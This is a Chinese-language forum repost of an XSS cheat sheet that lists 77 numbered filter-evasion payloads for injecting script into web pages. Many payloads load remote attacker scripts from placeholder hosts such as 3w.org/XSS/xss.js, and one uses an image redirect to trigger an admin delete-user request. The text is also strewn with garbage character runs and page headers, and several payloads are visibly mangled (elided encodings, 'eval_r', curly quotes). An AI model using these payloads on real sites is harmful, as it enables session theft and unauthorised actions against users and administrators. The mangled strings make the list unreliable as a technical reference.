貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。; Q$ N" ?% L2 F" \/ [' \8 ]0 t
(1)普通的XSS JavaScript注入- v( G1 l+ n# t- h
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 w9 y. a: u' Y, G, A; z(2)IMG标签XSS使用JavaScript命令
+ w) U% T3 k) |. N<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* E% l* w" v3 S(3)IMG标签无分号无引号
$ T& Y" ^9 d% ~* H- f$ i<IMG SRC=javascript:alert(‘XSS’)>( u* O" v( N0 @* D
(4)IMG标签大小写不敏感7 W; w# l% t* j" F; [0 b
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- {2 e4 w' d( Q8 z, b3 X7 m(5)HTML编码(必须有分号)
j9 ?$ ^; n0 m* N( y<IMG SRC=javascript:alert(“XSS”)>
' \9 t0 _0 F, L) C6 o(6)修正缺陷IMG标签
0 W" r! c) j+ w+ A: L# G6 C<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
4 ]0 Q! N; H5 f- l# F5 v" f2 q1 L5 Z- l6 k
* x. ?( L" W. E1 T/ k(7)formCharCode标签(计算器)
1 e$ e; J9 o& Z, K) p" I<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& u: c% ]4 }; U$ L6 G(8)UTF-8的Unicode编码(计算器)+ H/ B# Z7 x- D) ]
<IMG SRC=jav..省略..S')>
2 B4 x0 z0 ?& q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)1 W9 S) e' l6 @8 v3 @
<IMG SRC=jav..省略..S')>
6 O& M! P7 v2 E$ z$ j6 [3 f(10)十六进制编码也是没有分号(计算器)
0 F/ T: C8 I' ^/ N/ M" y<IMG SRC=java..省略..XSS')>5 Y( @' g6 b9 [& g+ e9 B5 c2 H, x
(11)嵌入式标签,将Javascript分开
9 J, D2 R% ~! T* ?. @ }<IMG SRC=”jav ascript:alert(‘XSS’);”>& H9 m" F( Y6 n: p$ v `
(12)嵌入式编码标签,将Javascript分开; x9 V( h! k, Y: l& c
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 }+ ~6 z$ D5 `# h1 I' u. T
(13)嵌入式换行符2 {$ I5 S% V w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: o6 R7 u! \# S# W1 n(14)嵌入式回车% S9 `/ u. n9 f3 Q' s) c+ O/ g2 K
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 v$ C; \0 S/ O" i(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 p6 p$ S+ R7 }<IMG SRC=”javascript:alert(‘XSS‘)”>2 h% A" d) j: Y9 r" \
(16)解决限制字符(要求同页面)
. _2 ~( r) _' F, K' O% z/ F( G. D<script>z=’document.’</script>
% s2 ]! Y. \" u<script>z=z+’write(“‘</script>! K* X: g: V8 V
<script>z=z+’<script’</script>
( [) [" J4 X3 n6 D) N# {<script>z=z+’ src=ht’</script>
% b3 H( H8 o( E B<script>z=z+’tp://ww’</script>
) y( `# i; J; l, M& Q/ [# t<script>z=z+’w.shell’</script>
$ a! c/ u' I6 _, p% K/ `: M<script>z=z+’.net/1.’</script>
) }: `" z5 r# Q2 Y5 [. k( `<script>z=z+’js></sc’</script>; F3 e9 D% B. P* ?
<script>z=z+’ript>”)’</script>
) H0 s Y8 X0 ]% q6 C, O8 }, u<script>eval_r(z)</script>
) N& h* n) b8 r$ o0 z: l+ l. x7 w(17)空字符12-7-1 T00LS - Powered by Discuz! Board, g7 K- K' Q" y4 q+ r5 E0 ^+ Q1 ?
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
; P" j1 b0 C% A% _2 W7 [) k3 u, Yperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 G- k; ]" P' W9 |5 _(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用" F% |1 U! H( Z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out |8 F$ W5 Z% z* F9 ]5 Y0 _+ [
(19)Spaces和meta前的IMG标签0 I8 o6 |- J0 w6 F1 p' G: b) x
<IMG SRC=” javascript:alert(‘XSS’);”>
' G6 \0 X, u- y' X6 L( u* N; y8 g0 d( m(20)Non-alpha-non-digit XSS/ }* a1 k, A! Q1 q4 u6 A5 U
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, d5 B. u& Z2 C2 y8 g& p
(21)Non-alpha-non-digit XSS to 2; `7 \0 F! t u6 b# C1 f% v* ~
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
+ n( b9 B# m( o6 a- w$ d(22)Non-alpha-non-digit XSS to 33 T# N8 ?0 Q7 {$ D7 K3 _: Y
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
n' o- W+ p2 u, L(23)双开括号/ t9 A: c" e+ K4 O
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: \( ^2 s6 q: H* W6 E8 u(24)无结束脚本标记(仅火狐等浏览器)
$ [3 z) b2 ^! D/ c7 v4 P. U# H/ Y<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
$ B( T; B& W5 M; _4 o(25)无结束脚本标记2
1 h; P1 M; F: [3 W: s<SCRIPT SRC=//3w.org/XSS/xss.js>, F& u4 B$ T9 e- ~9 i, B- C' |! o7 r
(26)半开的HTML/JavaScript XSS
3 N% ~: s9 P1 M" m: U; h5 B<IMG SRC=”javascript:alert(‘XSS’)”/ {3 q& D# N5 F" K, \3 N8 B
(27)双开角括号
- {, @4 \; _. f2 @3 D4 G<iframe src=http://3w.org/XSS.html <
* i8 u4 {2 ]& H+ G c+ B; E6 S(28)无单引号 双引号 分号' G/ Z: i# F- S$ Y
<SCRIPT>a=/XSS/( D5 D$ d& K9 K7 W& [/ _7 D
alert(a.source)</SCRIPT>
: P/ K4 o, Z5 H7 h(29)换码过滤的JavaScript
% [" t- `: h1 P: q( P2 r3 G\”;alert(‘XSS’);//
1 B( j; c( m% P$ A(30)结束Title标签; h" z# `; Z9 `( M. K
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% x+ {# Z. I( A; I
(31)Input Image! T$ E# N: s3 l' L0 P
<INPUT SRC=”javascript:alert(‘XSS’);”>
' p& Q5 w% h0 i5 ~ w, Y(32)BODY Image
. f' b$ V) b* Q( K3 R+ h. q<BODY BACKGROUND=”javascript:alert(‘XSS’)”>- d* p' S9 M- T
(33)BODY标签, c. W4 U$ a5 l. L
<BODY(‘XSS’)>. C/ o; Y0 }( I. g: L( H( h& n
(34)IMG Dynsrc
* o2 Y ^5 Q9 [7 p" v* e8 s<IMG DYNSRC=”javascript:alert(‘XSS’)”>
. h. H( S9 I4 o+ G: h(35)IMG Lowsrc
2 w0 |2 p. \! l! y<IMG LOWSRC=”javascript:alert(‘XSS’)”>
. @, V" o+ [4 }: s$ {3 e% W! R(36)BGSOUND
~: y# `. W$ J. }$ v<BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 K6 b; x$ j! R) l2 R) Y(37)STYLE sheet
5 o- h* Y# C, z* a5 I1 P<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> {/ B# A, F3 l8 F) z8 |- Z
(38)远程样式表
5 X; c2 D$ q3 m* o" p: j* r<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
, S6 y. ~) H. i$ x) V: H; G" r) C(39)List-style-image(列表式)# c0 y/ B$ R2 i
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% i- M& y# G, u$ n(40)IMG VBscript
+ G/ X4 o6 t2 s+ ^! W7 s<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
$ M0 q, ]9 Y4 |% H2 _" D9 P(41)META链接url
& R# n5 f& Z! ` x6 N% |, c6 ` Q, q& B) L
9 M L& _2 R/ d) b) O<META HTTP-EQUIV=”refresh” CONTENT=”0;
5 O* H8 I4 V) w0 @% tURL=http://;URL=javascript:alert(‘XSS’);”>3 d! b7 M( K9 J1 ]3 `' a5 {. S" `
(42)Iframe
& ]! S( f9 V" y" X. c# X% r3 `<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>/ S5 x5 ]9 W5 T) ?% _$ w; W
(43)Frame( [' B6 w; u- S u% e; R/ f
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board0 _' ?' W7 j1 j1 \$ t
https://www.t00ls.net/viewthread ... table&tid=15267 3/6$ @. P6 R) x) y) X& s, K
(44)Table( X) ]$ {/ V% J/ {4 k4 e5 W
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>, x% j# C" R% B8 O( M
(45)TD. T8 X) N, w( a# o/ e! Y8 i
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
' ~( A& ?! \5 @2 y1 X6 ?(46)DIV background-image
8 P" L& I8 N9 B5 X; a# q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 K. O& H$ R+ |- H
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
) z: \. `( T: Z: l$ ^. p: O8&13&12288&65279)' w; n+ [5 Y( {3 i! t' _
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 ~ W6 ^# B8 V(48)DIV expression
" J# D# V) j$ T! `2 b7 S* g<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
3 t6 c% x6 N. X: F; J [8 K% t0 P(49)STYLE属性分拆表达- z5 T o! @, h9 `5 V% n
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
3 O3 e2 @8 }: R1 L: {- Z(50)匿名STYLE(组成:开角号和一个字母开头)
) w' ^9 h3 \/ M T<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>& ~3 \ W: L* \8 w+ a4 N
(51)STYLE background-image: e8 E6 N+ j w0 K8 M
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
% h# H9 f8 g |3 b2 b% l1 C9 dCLASS=XSS></A>* j$ j. i9 r/ u q' s. ?
(52)IMG STYLE方式- }. Z6 f- s# \
exppression(alert(“XSS”))’>
9 h9 i, ~, Z( W3 I1 |, ^6 j# p(53)STYLE background4 C4 G Q/ n5 V2 `/ j' V9 `
<STYLE><STYLE
& s. D' i* q u" ^) M( Utype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ t8 D6 i; M: {(54)BASE u1 F; |9 h: b Q7 `; S
<BASE HREF=”javascript:alert(‘XSS’);//”>3 Y) ?/ a, G% o v& {- l7 v
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS c9 a7 D' T( ]' [& u. a" t, d
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, K6 C3 s" P3 x5 I, D; A% r(56)在flash中使用ActionScrpt可以混进你XSS的代码
3 y% S% W3 M1 f# a6 q }1 Ja=”get”;
[* r% g* Q1 v9 {8 a7 Q7 Y1 Cb=”URL(\”";
) p& M' d: l, H% X6 Sc=”javascript:”;
$ Z- g# o7 r7 K0 ^6 O0 zd=”alert(‘XSS’);\”)”;
4 W+ M) K3 L+ w9 S6 Z keval_r(a+b+c+d);6 s$ {; S. x5 Y& \9 h: p7 e# b, Q
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上$ `7 C8 T4 Q' o4 R
<HTML xmlns:xss>9 t6 E, T6 q* k d) m8 |7 f' Q
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
/ V7 ^/ I7 G3 j& w' u<xss:xss>XSS</xss:xss>
9 s. B: s g6 U: g* J; J% o' Q6 V) |</HTML>7 P" y, J5 y$ p/ t
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, X- k$ N" Q) R8 w<SCRIPT SRC=””></SCRIPT>
! H! {7 S! }+ R- S- J5 b(59)IMG嵌入式命令,可执行任意命令
( _0 }2 T' U% u# t<IMG SRC=”http://www.XXX.com/a.php?a=b”>2 U& q: Z- ?3 q
(60)IMG嵌入式命令(a.jpg在同服务器)
/ x: S% W/ V4 x1 {0 ] Y2 S% ARedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser8 D6 V5 T$ A1 V: k3 c7 l) k
(61)绕符号过滤: z% J9 n/ o$ R$ d
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. N1 {0 @; a: P; h& S7 x3 M8 K(62)9 n3 Y7 _# J2 b% o* d2 Y0 X0 `, j
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>, J& s" l N: i7 } v
(63)
5 ^. a! r! f5 k; {$ l/ G8 v<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 _$ `4 g, n r. _
(64)0 L8 ]3 b8 \. I7 p$ O
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>+ g& l8 m) m3 j: _3 N! H- j& H- `
(65)
$ r' F# _* T- |1 @9 h7 S" D<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>, o2 }: ?0 d$ d- ]' Y0 G9 G ?) p
(66)12-7-1 T00LS - Powered by Discuz! Board
2 V' |6 Y( M1 o# x# rhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
0 X3 S7 V+ W6 L" G<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
% y e# J& q0 w0 E! J* j(67)
1 Z4 P+ ~ L& Q<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>: u. {* d" x# @0 E/ J
</SCRIPT>+ c: q( h, P$ ]( L; J$ {
(68)URL绕行
3 I! `9 m" `8 i* l# q2 E<A HREF=”http://127.0.0.1/”>XSS</A>* Y4 t# {( [9 n6 I3 n5 y
(69)URL编码
: S( O) M( }" Y6 d( M m' `<A HREF=”http://3w.org”>XSS</A>
) Y; V F; v* v* g2 n4 J0 I(70)IP十进制
7 R9 `2 V6 M. A5 h* l# v& B* M" y<A HREF=”http://3232235521″>XSS</A>! S1 n) `& k ?3 p2 @2 s2 P
(71)IP十六进制
1 T0 y! }3 P4 C2 [8 i<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
, E: w2 i* C [, N(72)IP八进制; _" n) [- o: [; f9 R
<A HREF=”http://0300.0250.0000.0001″>XSS</A>, G. \% ~, p; h
(73)混合编码
9 v8 k0 L$ L/ k! `<A HREF=”h
! W# O4 B8 L4 `# w. vtt p://6 6.000146.0×7.147/”">XSS</A>. }1 E) m: F+ T) n
(74)节省[http:]
' ~( f+ a. ]1 Q5 A; u( B5 j9 l" l<A HREF=”//www.google.com/”>XSS</A>$ a1 d( E( Z8 F* Z
(75)节省[www]9 m7 K7 [+ M" D% v) Y) L! W
<A HREF=”http://google.com/”>XSS</A>% w% \, R5 l8 x; i! u
(76)绝对点绝对DNS
5 g- J* f; e: D: P<A HREF=”http://www.google.com./”>XSS</A>
& G' N# N# `2 a/ o# u, z(77)javascript链接
1 m* h8 U& R6 u$ M' t' ^+ p<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
+ K X1 ^$ u6 U* w7 Q( K* M$ r1 Q6 p& o
原文地址:http://fuzzexp.org/u/0day/?p=14
9 L4 T& c; E( }, o+ T
2 a2 \8 p F* C$ q1 R$ e9 u |
发表于 2013-4-19 19:22:37
收藏
支持
反对